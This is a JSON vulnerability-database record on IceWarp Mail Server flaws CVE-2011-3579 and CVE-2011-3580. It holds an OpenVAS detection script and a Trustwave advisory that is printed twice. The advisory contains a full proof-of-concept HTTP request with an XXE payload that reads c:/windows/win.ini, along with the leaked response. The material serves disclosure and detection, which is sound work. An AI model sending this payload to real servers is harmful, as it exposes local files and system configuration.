the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103279\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49753\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"summary\", value:\"IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || \"IceWarp\" >!< banner ) exit( 0 );\n\nforeach dir( make_list_unique( \"/webmail\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/server/\";\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\$\$\", usecache:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"]}], "packetstorm": [{"id": "PACKETSTORM:105320", "hash": "3487bb50e9329a21746315dea621eb8d", "type": "packetstorm", "bulletinFamily": "exploit", "title": "IceWarp Mail Server Injection / Information Disclosure", "description": "", "published": "2011-09-23T00:00:00", "modified": "2011-09-23T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/", "score": 6.4}, "href": "https://packetstormsecurity.com/files/105320/IceWarp-Mail-Server-Injection-Information-Disclosure.html", "reporter": "trustwave.com", "references": [], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2016-12-05T22:17:52", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2016-12-05T22:17:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478", "OPENVAS:103279"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920", "SECURITYVULNS:DOC:27071"]}, {"type": "exploitdb", "idList": ["EDB-ID:36165"]}], "modified": "2016-12-05T22:17:52", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://packetstormsecurity.com/files/download/105320/TWSL2011-013.txt", "sourceData": "`Trustwave's SpiderLabs Security Advisory TWSL2011-013: \nMultiple Vulnerabilities in IceWarp Mail Server \n \nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt \n \nPublished: 2011-09-23 \nVersion: 1.0 \n \nVendor: IceWarp (http://www.icewarp.com) \nProduct: IceWarp Mail Server \nVersion affected: 10.3.2 and below \n \nProduct description: IceWarp WebMail is the web front-end for the IceWarp \nMail Server, which provides email access on over 50,000 servers. IceWarp \nWebMail provides web-based access to email, calendars, contacts, files \nand shared data from any computer with a browser and Internet connection. \n \nCredit: David Kirkpatrick of Trustwave's SpiderLabs \n \nFinding 1: XML External Entity Injection \nCVE: CVE-2011-3579 \n \nAn external entity is a function of the XML specification which allows XML \ndocuments to reference resources external to the XML document. This \nfunctionality forces the XML parser of the application to access the \nresource specified. \n \nIn this case it is possible to inject an XML DOCTYPE \"SYSTEM\" directive to \naccess local files on the operating system where the IceWarp server is \ninstalled. Using this technique it is possible to retrieve readable files \non the operating system. This attack can also be used to create a possible \ndenial of service condition. \n \nProof-of-Concept: \n \nThe following POST request was sent to the host A.B.C.D where the IceWarp \nmail server was running: \n \nREQUEST \n========= \nPOST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1 \nHost:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) \nGecko/20100101 Firefox/5.0 \nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language:en-gb,en;q=0.5i've \nAccept-Encoding: gzip, deflate \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nProxy-Connection: keep-alive \nReferer: http://A.B.C.D \nContent-Length: 249 \nContent-Type: application/xml;charset=UTF-8 \nPragma: no-cache \nCache-Control: no-cache \n \n<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM \"file:///c:/windows/win.ini\"> ]><iq \ntype=\"set\"><query \nxmlns=\"webmail:iq:auth\"><username>test&xxeb91c4;</username><digest>828cd27c \n6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc \nd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method>< \n/query></iq> \n \nRESPONSE: \n========== \nHTTP/1.1 200 OK \nServer: IceWarp/9.4.2 \nDate: Wed, 20 Jul 2011 10:04:56 GMT \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control:no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 Pragma: no-cache \nContent-Type: text/xml \nVary: Accept-Encoding \nContent-Length: 1113 \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?><iq type=\"error\"><error \nuid=\"login_invalid\">test; for 16-bit app support \n[fonts] \n[extensions] \n[mci extensions] \n[files] \n[Mail] \nMAPI=1 \n....TRUNCATED \n \nThe above proof-of-concept would retrieve the c:\\windows\\win.ini file (the \nresponse in this example has been truncated). \n \n \nFinding 2: PHP Information Disclosure \nCVE: CVE-2011-3580 \n \nIt is possible to retrieve the PHP information file phpinfo() by accessing \nthe following URL http://A.B.C.D/server where A.B.C.D is the IP of the \nserver running the IceWarp software. The response will be a page detailing \nthe PHP version used and the configuration settings of PHP, including \nsystem details. \n \n \nVendor Response: These issues have been addressed as of version 10.3.3 \n \nRemediation Steps: Customers should update to the latest version of IceWarp \nMail Server in order to address these issues. The above issues have been \ncorrected in version 10.3.3. \n \nRevision History: \n08/03/11 - Vulnerability disclosed \n09/19/11 - Patch released \n09/23/11 - Advisory published \n \n \nAbout Trustwave: Trustwave is the leading provider of on-demand and \nsubscription-based information security and payment card industry \ncompliance management solutions to businesses and government entities \nthroughout the world. For organizations faced with today's challenging \ndata security and compliance environment, Trustwave provides a unique \napproach with comprehensive solutions that include its flagship \nTrustKeeper compliance management software and other proprietary security \nsolutions. Trustwave has helped thousands of organizations--ranging from \nFortune 500 businesses and large financial institutions to small and \nmedium-sized retailers--manage compliance and secure their network \ninfrastructure, data communications and critical information assets. \nTrustwave is headquartered in Chicago with offices throughout North \nAmerica, South America, Europe, Africa, China and Australia. For more \ninformation, visit https://www.trustwave.com \n \nAbout Trustwave's SpiderLabs: SpiderLabs is the advance security team at \nTrustwave responsible for incident response and forensics, ethical hacking \nand application security tests for Trustwave's clients. SpiderLabs has \nresponded to hundreds of security incidents, performed thousands of ethical \nhacking exercises and tested the security of hundreds of business \napplications for Fortune 500 organizations. For more information visit \nhttps://www.trustwave.com/spiderlabs \n \nDisclaimer: The information provided in this advisory is provided \"as is\" \nwithout warranty of any kind. Trustwave disclaims all warranties, either \nexpress or implied, including the warranties of merchantability and fitness \nfor a particular purpose. In no event shall Trustwave or its suppliers be \nliable for any damages whatsoever including direct, indirect, incidental, \nconsequential, loss of business profits or special damages, even if \nTrustwave or its suppliers have been advised of the possibility of such \ndamages. Some states do not allow the exclusion or limitation of liability \nfor consequential or incidental damages so the foregoing limitation may not \napply. \n \n \n \n \nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. \n \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"]}], "exploitdb": [{"id": "EDB-ID:36165", "hash": "6f376b5d33db7c738703844f72d2b03b9d3f5a68732f58cae8305318b3f1acc0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure", "description": "IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure. CVE-2011-3579. Webapps exploit for php platform", "published": "2011-09-24T00:00:00", "modified": "2011-09-24T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/36165/", "reporter": "David Kirkpatrick", "references": [], "cvelist": ["CVE-2011-3579"], "lastseen": "2016-02-04T02:53:22", "history": [{"lastseen": "2016-02-04T02:53:22", "different_elements": ["cvss2"], "edition": 1, "bulletin": {"lastseen": "2016-02-04T02:53:22", "references": [], "description": "IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure. CVE-2011-3579. Webapps exploit for php platform", "edition": 1, "cvss3": {}, "reporter": "David Kirkpatrick", "history": [], "published": "2011-09-24T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2016-02-04T02:53:22", "vector": "NONE", "value": 6.2}, "dependencies": {"rev": 2, "references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["CVE-2011-3579"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "modified": "2016-02-04T02:53:22"}}, "title": "IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure", "type": "exploitdb", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3579"], "immutableFields": [], "modified": "2011-09-24T00:00:00", "href": "https://www.exploit-db.com/exploits/36165/", "id": "EDB-ID:36165", "viewCount": 9, "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "hashmap": [{"hash": "cc77423fa8790dac8ce885e6078f3a6f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "fde624b15f9f373c5b3bfc75c6657184", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "9ea6302052b6ef5ca37ef936d0707ff2", "key": "href"}, {"hash": "873d8334dac92d89e23af0e7431aa456", "key": "cvelist"}, {"hash": "98af874f780ed3c9185e453bdaddb846", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "cc77423fa8790dac8ce885e6078f3a6f", "key": "modified"}, {"hash": "362d121eca25eedeb79599ecac43b9fc", "key": "description"}, {"hash": "ea1bdd9185a2c3160cbbe9c0292c3d62", "key": "cvss"}], "hash": "faaf69fbaa49f14985f85391d3de0a549b3b9f0ce8e4c78844463ef56384efcb"}}], "viewCount": 9, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2016-02-04T02:53:22", "rev": 2}, "dependencies": {"references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["CVE-2011-3579"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "modified": "2016-02-04T02:53:22", "rev": 2}, "exploitation": {"wildExploited": false, "wildExploitedSources": [], "modified": "2016-02-04T02:53:22"}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/36165/", "sourceData": "source: http://www.securityfocus.com/bid/49753/info\r\n\r\nIceWarp Web Mail is prone to multiple information-disclosure vulnerabilities.\r\n\r\nAttackers can exploit these issues to gain access to potentially sensitive information, and possibly cause denial-of-service conditions; other attacks may also be possible. \r\n\r\nProof-of-Concept:\r\n\r\nThe following POST request was sent to the host A.B.C.D where the IceWarp mail\r\nserver was running:\r\n\r\nREQUEST \r\n========= \r\nPOST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1 \r\nHost:A.B.C.D \r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101\r\nFirefox/5.0 \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \r\nAccept-Language:en-gb,en;q=0.5i've \r\nAccept-Encoding: gzip, deflate \r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \r\nProxy-Connection: keep-alive \r\nReferer: http://A.B.C.D \r\nContent-Length: 249 \r\nContent-Type: application/xml; \r\ncharset=UTF-8\r\nPragma: no-cache \r\nCache-Control: no-cache\r\n\r\n<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM \"file:///c:/windows/win.ini\"> ]><iq\r\ntype=\"set\"><query xmlns=\"webmail:iq:auth\"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>\r\n\r\nRESPONSE: \r\n========== \r\nHTTP/1.1 200 OK \r\nServer: IceWarp/9.4.2 \r\nDate: Wed, 20 Jul\r\n2011 10:04:56 GMT \r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT \r\nCache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \r\nPragma: no-cache\r\nContent-Type: text/xml \r\nVary: Accept-Encoding \r\nContent-Length: 1113\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><iq type=\"error\"><error\r\nuid=\"login_invalid\">test; for 16-bit app support \r\n[fonts] \r\n[extensions] \r\n[mci extensions] \r\n[files] \r\n[Mail] \r\nMAPI=1\r\n....TRUNCATED", "osvdbidlist": ["75721"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "scheme": null, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "873d8334dac92d89e23af0e7431aa456"}, {"key": "cvss", "hash": "ea1bdd9185a2c3160cbbe9c0292c3d62"}, {"key": "cvss2", "hash": "315d7a7b15cda393ce9fffb73645c6c3"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "362d121eca25eedeb79599ecac43b9fc"}, {"key": "href", "hash": "9ea6302052b6ef5ca37ef936d0707ff2"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "cc77423fa8790dac8ce885e6078f3a6f"}, {"key": "published", "hash": "cc77423fa8790dac8ce885e6078f3a6f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "98af874f780ed3c9185e453bdaddb846"}, {"key": "title", "hash": "fde624b15f9f373c5b3bfc75c6657184"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}]}], "securityvulns": [{"id": "SECURITYVULNS:VULN:11920", "bulletinFamily": "software", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2011-09-26T00:00:00", "modified": "2011-09-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11920", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27068", "https://vulners.com/securityvulns/securityvulns:doc:27067", "https://vulners.com/securityvulns/securityvulns:doc:27055", "https://vulners.com/securityvulns/securityvulns:doc:27051", "https://vulners.com/securityvulns/securityvulns:doc:27071", "https://vulners.com/securityvulns/securityvulns:doc:27063", "https://vulners.com/securityvulns/securityvulns:doc:27066", "https://vulners.com/securityvulns/securityvulns:doc:27064", "https://vulners.com/securityvulns/securityvulns:doc:27065", "https://vulners.com/securityvulns/securityvulns:doc:27052"], "cvelist": ["CVE-2011-3010", "CVE-2011-3645", "CVE-2011-3579"], "type": "securityvulns", "lastseen": "2021-06-08T18:45:23", "history": [{"bulletin": {"affectedSoftware": [{"name": "Auto Classifieds Script", "operator": "eq", "version": "3.2"}, {"name": "Real Estate Classifieds", "operator": "eq", "version": "3.2"}, {"name": "Advanced Electron Forums", "operator": "eq", "version": "1.0"}, {"name": "Pets Classifieds Software", "operator": "eq", "version": "3.2"}, {"name": "General Classifieds Software", "operator": "eq", "version": "3.2"}, {"name": "AWStats", "operator": "eq", "version": "6.0"}, {"name": "IceWarp Mail Server", "operator": "eq", "version": "10.3"}, {"name": "Serendipity", "operator": "eq", "version": "1.5"}, {"name": "PunBB", "operator": "eq", "version": "1.3"}, {"name": "AWStats", "operator": "eq", "version": "7.0"}, {"name": "TWiki", "operator": "eq", "version": "5.1"}, {"name": "AdaptCMS", "operator": "eq", "version": "2.0"}, {"name": "secureURL", "operator": "eq", "version": "2.0"}, {"name": "Help Desk Software", "operator": "eq", "version": "1.1"}], "bulletinFamily": "software", "cvelist": ["CVE-2011-3010", "CVE-2011-3645", "CVE-2011-3579"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:09:43", "references": [{"idList": ["CVE-2011-3010", "CVE-2011-3645", "CVE-2011-3579"], "type": "cve"}, {"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478", "OPENVAS:1361412562310802335"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:DOC:27055", "SECURITYVULNS:DOC:27065", "SECURITYVULNS:DOC:27066", "SECURITYVULNS:DOC:27063", "SECURITYVULNS:DOC:27068", "SECURITYVULNS:DOC:27064", "SECURITYVULNS:DOC:27051", "SECURITYVULNS:DOC:27052", "SECURITYVULNS:DOC:27067"], "type": "securityvulns"}, {"idList": ["EXPLOITPACK:2D230AE416531379B40E85A0CE278C8F"], "type": "exploitpack"}, {"idList": ["SSV:20951", "SSV:72165"], "type": "seebug"}, {"idList": ["EDB-ID:36165", "EDB-ID:36163", "EDB-ID:17897", "EDB-ID:36162"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:105309", "PACKETSTORM:105337", "PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2018-08-31T11:09:43", "rev": 2, "value": 5.2, "vector": "NONE"}}, "hash": "fdd5b74e0dd32c02ab8c0ec2f86ae45779ce3d69c869e73ecff70221dcc3d5d2", "hashmap": [{"hash": "e1a5f8af5ffae85d925aeb95f9fc6188", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "a6c0428794f6ab44813748465acb10a5", "key": "references"}, {"hash": "c61e5d59aa5c4e535b518cca44e00a6f", "key": "description"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "7215ee9c7d9dc229d2921a40e899ec5f", "key": "reporter"}, {"hash": "84a25075c17f4cc4b356062afe5047cc", "key": "href"}, {"hash": "e1a5f8af5ffae85d925aeb95f9fc6188", "key": "modified"}, {"hash": "acfd744d57f8a0f84945f5e093933477", "key": "cvelist"}, {"hash": "042f149580de36e4e8f307186f8a5b9c", "key": "affectedSoftware"}, {"hash": "9caff91e9ebcf551c6d0d9d96b286138", "key": "title"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11920", "id": "SECURITYVULNS:VULN:11920", "immutableFields": [], "lastseen": "2018-08-31T11:09:43", "modified": "2011-09-26T00:00:00", "objectVersion": "1.5", "published": "2011-09-26T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27068", "https://vulners.com/securityvulns/securityvulns:doc:27067", "https://vulners.com/securityvulns/securityvulns:doc:27055", "https://vulners.com/securityvulns/securityvulns:doc:27051", "https://vulners.com/securityvulns/securityvulns:doc:27071", "https://vulners.com/securityvulns/securityvulns:doc:27063", "https://vulners.com/securityvulns/securityvulns:doc:27066", "https://vulners.com/securityvulns/securityvulns:doc:27064", "https://vulners.com/securityvulns/securityvulns:doc:27065", "https://vulners.com/securityvulns/securityvulns:doc:27052"], "reporter": " ", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "viewCount": 28}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:09:43"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "ee315c7805adb75c63f436bbc072e29a"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "acfd744d57f8a0f84945f5e093933477"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "c61e5d59aa5c4e535b518cca44e00a6f"}, {"key": "href", "hash": "84a25075c17f4cc4b356062afe5047cc"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "e1a5f8af5ffae85d925aeb95f9fc6188"}, {"key": "published", "hash": "e1a5f8af5ffae85d925aeb95f9fc6188"}, {"key": "references", "hash": "a6c0428794f6ab44813748465acb10a5"}, {"key": "reporter", "hash": "7215ee9c7d9dc229d2921a40e899ec5f"}, {"key": "title", "hash": "9caff91e9ebcf551c6d0d9d96b286138"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "17257f66ee182329f61d531827aa9326ba1e15f0735da047f9fe7b88187c3b4e", "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3010", "CVE-2011-3579", "CVE-2011-3645"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-3010"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27052", "SECURITYVULNS:DOC:27067", "SECURITYVULNS:DOC:27055", "SECURITYVULNS:DOC:27064", "SECURITYVULNS:DOC:27066", "SECURITYVULNS:DOC:27068", "SECURITYVULNS:DOC:27065", "SECURITYVULNS:DOC:27051", "SECURITYVULNS:DOC:27063", "SECURITYVULNS:DOC:27071"]}, {"type": "exploitdb", "idList": ["EDB-ID:36165", "EDB-ID:36162", "EDB-ID:17897", "EDB-ID:36163"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105337", "PACKETSTORM:105320", "PACKETSTORM:105309"]}, {"type": "openvas", "idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478", "OPENVAS:1361412562310802335"]}, {"type": "seebug", "idList": ["SSV:72165", "SSV:20951"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2D230AE416531379B40E85A0CE278C8F"]}], "modified": "2021-06-08T18:45:23", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2021-06-08T18:45:23", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "auto classifieds script", "operator": "eq", "version": "3.2"}, {"name": "punbb", "operator": "eq", "version": "1.3"}, {"name": "serendipity", "operator": "eq", "version": "1.5"}, {"name": "adaptcms", "operator": "eq", "version": "2.0"}, {"name": "secureurl", "operator": "eq", "version": "2.0"}, {"name": "awstats", "operator": "eq", "version": "6.0"}, {"name": "twiki", "operator": "eq", "version": "5.1"}, {"name": "real estate classifieds", "operator": "eq", "version": "3.2"}, {"name": "advanced electron forums", "operator": "eq", "version": "1.0"}, {"name": "awstats", "operator": "eq", "version": "7.0"}, {"name": "general classifieds software", "operator": "eq", "version": "3.2"}, {"name": "icewarp mail server", "operator": "eq", "version": "10.3"}, {"name": "help desk software", "operator": "eq", "version": "1.1"}, {"name": "pets classifieds software", "operator": "eq", "version": "3.2"}], "immutableFields": [], "scheme": null}]}